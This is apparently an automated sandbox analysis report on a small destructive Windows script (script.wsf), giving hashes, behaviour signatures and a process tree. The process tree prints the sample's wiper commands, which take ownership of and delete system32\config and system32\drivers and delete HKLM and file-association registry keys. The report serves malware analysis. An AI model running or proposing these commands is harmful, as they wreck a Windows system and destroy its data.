Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-08-2024 21:44

General

  • Target

    script.wsf

  • Size

    3KB

  • MD5

    0355b976d816c3dafeda740c75450a08

  • SHA1

    98de5b1ee4c653658966effecf248bf7a8df7cd1

  • SHA256

    7786be7dadf8cf4d51607d72cdd3a7f047668c91edfbf5c0623798688d712ab7

  • SHA512

    2aa4dd903915d0f7394ebb8b802ad81d2aeda3561d94dc679b693a7e5b32a2f1bf79f0ddffb8971bd61f95b5a68d8bfbb8a5fa361f8580620ad7ab8985210779

Score
8/10

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:720
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4456
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:636
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\config\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2000
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\config\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1244
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3820
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\drivers\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:2732
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\drivers\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3144
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg.exe delete HKCR\*.dll /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1872
        • C:\Windows\system32\reg.exe
          reg.exe delete HKCR\*.dll /f
          4⤵
            PID:4088
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c reg.exe delete HKCR\*.exe /f
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3588
          • C:\Windows\system32\reg.exe
            reg.exe delete HKCR\*.exe /f
            4⤵
              PID:5016
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c reg.exe delete HKLM\* /f
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4572
            • C:\Windows\system32\reg.exe
              reg.exe delete HKLM\* /f
              4⤵
              • Modifies registry key
              PID:4072
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4436
        • C:\Windows\system32\dashost.exe
          dashost.exe {1e311568-a5fe-462b-b57c715b317ab229}
          2⤵
            PID:728
        • C:\Program Files\VideoLAN\VLC\vlc.exe
          "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\StartComplete.mid"
          1⤵
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          PID:3672
        • C:\Windows\system32\wermgr.exe
          "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3188" "928" "840" "932" "0" "0" "936" "940" "0" "0" "0" "0"
          1⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          PID:916
        • C:\Windows\system32\OpenWith.exe
          C:\Windows\system32\OpenWith.exe -Embedding
          1⤵
          • Modifies registry class
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2252
          • C:\Windows\system32\NOTEPAD.EXE
            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\StartComplete.mid
            2⤵
            • Opens file in notepad (likely ransom note)
            PID:1044

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs

          Filesize

          3KB

          MD5

          0355b976d816c3dafeda740c75450a08

          SHA1

          98de5b1ee4c653658966effecf248bf7a8df7cd1

          SHA256

          7786be7dadf8cf4d51607d72cdd3a7f047668c91edfbf5c0623798688d712ab7

          SHA512

          2aa4dd903915d0f7394ebb8b802ad81d2aeda3561d94dc679b693a7e5b32a2f1bf79f0ddffb8971bd61f95b5a68d8bfbb8a5fa361f8580620ad7ab8985210779

        • C:\Users\Admin\Desktop\desktop.vbs

          Filesize

          79B

          MD5

          edc6cfebfd829729d9fc80aaaf02d193

          SHA1

          6d04bf8c7b542301f7eb77eeceed16969053537c

          SHA256

          d0391b24b4bb809ba05a9b9e3fbee72a8b39381b16567de0ca7d9f403211cb47

          SHA512

          8afab19929d1bc3fe4d878ee7dd0b711834e53564afdf8e7d0a7186d1f01b35f5f4aeba4d3c5c964e2fbda08203611dc8bd140b717d3e579dc4b3f1684e3908c

        • C:\Users\Admin\Music\SuspendProtect.mp3

          Filesize

          2B

          MD5

          81051bcc2cf1bedf378224b0a93e2877

          SHA1

          ba8ab5a0280b953aa97435ff8946cbcbb2755a27

          SHA256

          7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

          SHA512

          1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

        • memory/3672-210-0x00007FF66A990000-0x00007FF66AA88000-memory.dmp

          Filesize

          992KB

        • memory/3672-211-0x00007FFA189C0000-0x00007FFA189F4000-memory.dmp

          Filesize

          208KB

        • memory/3672-212-0x00007FFA080C0000-0x00007FFA08376000-memory.dmp

          Filesize

          2.7MB

        • memory/3672-213-0x00007FFA06600000-0x00007FFA076B0000-memory.dmp

          Filesize

          16.7MB